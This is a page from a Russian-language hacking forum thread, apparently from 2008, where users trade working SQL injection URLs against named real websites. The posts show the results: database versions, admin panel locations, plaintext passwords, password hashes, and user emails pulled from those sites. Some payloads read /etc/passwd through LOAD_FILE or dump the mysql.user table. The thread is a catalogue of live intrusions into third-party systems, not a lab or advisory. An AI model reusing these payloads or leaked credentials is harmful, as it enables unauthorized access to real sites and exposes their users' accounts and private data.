ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4291  
Старый 02.01.2008, 23:33
5taY3r
Познающий
Регистрация: 10.05.2007
Сообщений: 38
Провел на форуме:
453576

Репутация: 100
По умолчанию

www.wichita.co.uk
Код:
http://www.wichita.co.uk/productdetails.php?id=-1+union+select+convert(concat_ws(0x3a,version(),user(),database())+using+latin1),2,3,4/*
4.1.10a-standard-log:admin@localhost:wichita
 
Ответить с цитированием

www.gramis.com
  #4292  
Старый 02.01.2008, 23:50
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию www.gramis.com

www.gramis.com

Код HTML:
http://www.gramis.com/novina.php?id=-6+UNION+SELECT+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5/*
4.1.22-log:gramis@localhost:gramis
Код HTML:
http://www.gramis.com/novina.php?id=-6+UNION+SELECT+1,2,3,concat(username,0x3a,password),5+FROM+users+LIMIT+0,1/*
admin:babelfi67
Админка:
http://gramis.com/admin/index.php

Код HTML:
http://www.gramis.com/novina.php?id=-6+UNION+SELECT+1,2,3,concat(user_id,0x3a,username,0x3a,user_password,0x3a,user_icq),5+FROM+phpbb_users+LIMIT+1,1/*
2:admin:f7c2d7fc1be27fcb6fc6d6dace13525e:::babelfi67
Вход на форум:
http://www.gramis.com/phpbb/login.php
 
Ответить с цитированием

  #4293  
Старый 03.01.2008, 00:35
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

интересная скуль

код:

http://angara.ur.ru/?page=serv&id=-1014+union+select+1,2,concat(table_schema,0x3a,tab le_name,0x3a,column_name),4+from+information_schem a.columns+where+column_name+like+0x257061737325+li mit+0,1/*

админских таблиц 116!!! шт.
Кому интересно,делайте выводы
 
Ответить с цитированием

  #4294  
Старый 03.01.2008, 01:42
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

http://www.yuldash.com/tg/index.php?id=26096+union+select+1,2,3,4,5,6,7/*&q=mes

Дальше уж сами...уже поздно и мне лень)) Может потом сделаю))

Ищите видимые поля нежи))
 
Ответить с цитированием

  #4295  
Старый 03.01.2008, 02:53
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

versii.com.ua
Код:
http://versii.com.ua/telegraf/print.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9/*
5.0.45-log:versii@localhost:versii

Админка:
Код:
http://versii.com.ua/admin/
 
Ответить с цитированием

  #4296  
Старый 03.01.2008, 03:00
je0n
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
Провел на форуме:
1543521

Репутация: 272
Отправить сообщение для je0n с помощью ICQ
По умолчанию

http://www.trinidadexpress.com/index.pl/article_news?id=161245965+UNION+SELECT+1,version() ,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32

4.0.27-standard-log
csite01@AdServNode1


непонятная админка:

http://admin.trinidadexpress.com/
логин:пароль
carlos:carlos
 
Ответить с цитированием

  #4297  
Старый 03.01.2008, 03:18
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию

MySQL Injection:
http://nashfilm.ru/index.php?option=rss_exporter&version=1&feed_id=-1+union+select+1,concat(user,password,host),3,4,5, 6,7,8,9,10,11,12,13,concat(USER(),VERSION(),DATABA SE()),15,16+FROM+mysql.user/*
http://nashfilm.ru/index.php?option=rss_exporter&version=1&feed_id=-1+union+select+1,2,3,4,5,LOAD_FILE(char(47,101,116 ,99,47,112,97,115,115,119,100)),7,8,9,10,11,12,13, 14,15,16/*
http://www.catltd.ru/prices.html?cg=-1+UNION+SELECT+1,2,3,4,USER(),6,7/*
БД 4, а жаль. Таблицы с лету подобрать не удалось. Если кто будет ковыряться, плиз отпишитесь о результатах .

MsSQL Injection:

http://www.goodmoves.org.uk/findajob/findajobdet.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME +FROM+INFORMATION_SCHEMA.TABLES)--
 
Ответить с цитированием

  #4298  
Старый 03.01.2008, 03:45
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию

www.big6.com

Код HTML:
http://www.big6.com/showarticle.php?id=-16+UNION+SELECT+concat(version(),0x3a,user(),0x3a,database()),2,3,4,5/*
5.0.37-log:big6@localhost:big6

Интересные таблицы:
wp_users
poll_user
customers
blog_users


Т.к. сейчас слишком поздно, какие из них фальшивые разбираться не стал:
Код HTML:
http://www.big6.com/showarticle.php?id=-16+UNION+SELECT+concat(ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email),2,3,4,5+FROM+wp_users+LIMIT+1,1/*
2:sue:e7e9ec3723447a642f762b2b6a15cfd7:sue_wurster @big6.com::bella
...
Код HTML:
http://www.big6.com/showarticle.php?id=-16+UNION+SELECT+concat(user_id,0x3a,username,0x3a,userpass),2,3,4,5+FROM+poll_user/*
1:admin:d158b1d234953b66bfc119f17f800b7b::big6php
Код HTML:
http://www.big6.com/showarticle.php?id=-16+UNION+SELECT+concat(customers_id,0x3a,customers_email_address,0x3a,customers_password),2,3,4,5+FROM+customers/*
1:root@localhost:d95e8fa7f20a009372eb3477473fcd34: 1c::1cpassword

P.S. С blog_users все то же самое, что и с wp_users =)

Последний раз редактировалось ~EviL~; 03.01.2008 в 03:48..
 
Ответить с цитированием

  #4299  
Старый 03.01.2008, 08:28
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.nram.org.nz/

Код:
http://www.nram.org.nz/record.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+USERS+limit+0,1/*
 
Ответить с цитированием

  #4300  
Старый 03.01.2008, 09:05
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://www.blogi.moje.pl/kategor.php?id_kategori=-1+union+select+1,VERSION(),3,4,5,6,7/*
Код:
http://tibiacz.com/kategorie_predmet.php?kat=-1+union+select+1,2,3,4,concat_ws(0x203a20,table_name,column_name),6,7,8,9,10,11+from+information_schema.columns/*
Код:
http://www.cytaty.pl/wyslij.php?numer=0+union+select+1,VERSION(),3,4,5,6/*
Код:
http://opisygg.szabloniki.com/index.php?pokaz_opis=-3871+union+select+1,VERSION(),3,4,5,6/*
Код:
http://www.ggopis.info/opis.php?id=0+UNION+SELECT+1,2,3,4,5,6,7/*
Код:
http://www.foto.oaza.pl/pokaz.php?strona=1&id=-9+union+select+1,2,3,VERSION(),5,6,7,8,9,10,11,12/*

Последний раз редактировалось SWAT; 03.01.2008 в 09:46..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ